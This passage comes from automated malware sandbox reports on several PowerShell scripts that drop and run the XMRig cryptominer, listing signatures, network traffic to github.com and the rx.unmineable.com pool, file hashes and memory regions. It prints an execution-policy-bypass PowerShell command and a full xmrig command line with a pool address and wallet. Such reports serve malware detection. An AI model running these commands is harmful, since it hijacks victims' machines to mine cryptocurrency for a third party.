GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/824-0-0x00007FFC6AE23000-0x00007FFC6AE25000-memory.dmp

memory/824-6-0x0000025F47440000-0x0000025F47462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hrnlhy5f.vua.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/824-11-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/824-12-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/824-14-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/824-15-0x0000025F48200000-0x0000025F48212000-memory.dmp

memory/824-16-0x0000025F474D0000-0x0000025F474DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2328-47-0x00000147B0380000-0x00000147B03A0000-memory.dmp

memory/2328-48-0x00000147B05E0000-0x00000147B0600000-memory.dmp

memory/824-50-0x00007FFC6AE23000-0x00007FFC6AE25000-memory.dmp

memory/2328-49-0x00007FF633600000-0x00007FF634233000-memory.dmp

memory/824-51-0x00007FFC6AE20000-0x00007FFC6B8E1000-memory.dmp

memory/2328-54-0x00000147B0620000-0x00000147B0640000-memory.dmp

memory/2328-53-0x00000147B0600000-0x00000147B0620000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:10

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4240-2-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-5-0x000002344F180000-0x000002344F1A2000-memory.dmp

memory/4240-8-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-9-0x000002344F430000-0x000002344F4A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4ovhlbb.u5g.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4240-10-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-48-0x000002344F410000-0x000002344F422000-memory.dmp

memory/4240-61-0x000002344F400000-0x000002344F40A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:59

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4764-0-0x00007FFF10393000-0x00007FFF10395000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kluvmv3n.c4l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1228-0-0x00007FFE180D3000-0x00007FFE180D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gmyqtuxk.mbn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:12

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1472-0-0x00007FFAD4073000-0x00007FFAD4075000-memory.dmp

memory/1472-3-0x00000218F6CB0000-0x00000218F6CD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oluzusqg.s3m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:12

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1743s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

memory/3444-0-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

memory/3444-1-0x0000024D9E820000-0x0000024D9E842000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br4rxfbh.dwb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3444-11-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3444-12-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3444-14-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3444-15-0x0000024D9EB90000-0x0000024D9EBA2000-memory.dmp

memory/3444-16-0x0000024D86450000-0x0000024D8645A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1136-47-0x00000198AF400000-0x00000198AF420000-memory.dmp

memory/1136-48-0x00000198AF450000-0x00000198AF470000-memory.dmp

memory/1136-49-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/3444-50-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

memory/3444-51-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/1136-53-0x00000198AF470000-0x00000198AF490000-memory.dmp

memory/1136-52-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-54-0x00000198AF490000-0x00000198AF4B0000-memory.dmp

memory/3444-55-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/1136-56-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-58-0x00000198AF470000-0x00000198AF490000-memory.dmp

memory/1136-57-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-59-0x00000198AF490000-0x00000198AF4B0000-memory.dmp

memory/1136-60-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-61-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-62-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-63-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-64-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-65-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-66-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-67-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-68-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-69-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-70-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-71-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-72-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-73-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-74-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-75-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-76-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-77-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-78-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-79-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-80-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-81-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-82-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-83-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-84-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-85-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-86-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-87-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-88-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-89-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-90-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-91-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-92-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-93-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-94-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-95-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-96-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-97-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-98-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-99-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-100-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-101-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-102-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-103-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-104-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-105-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-106-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-107-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-108-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-109-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-110-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-111-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-112-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-113-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-114-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-115-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-116-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-117-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-118-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:51

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows; every field N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
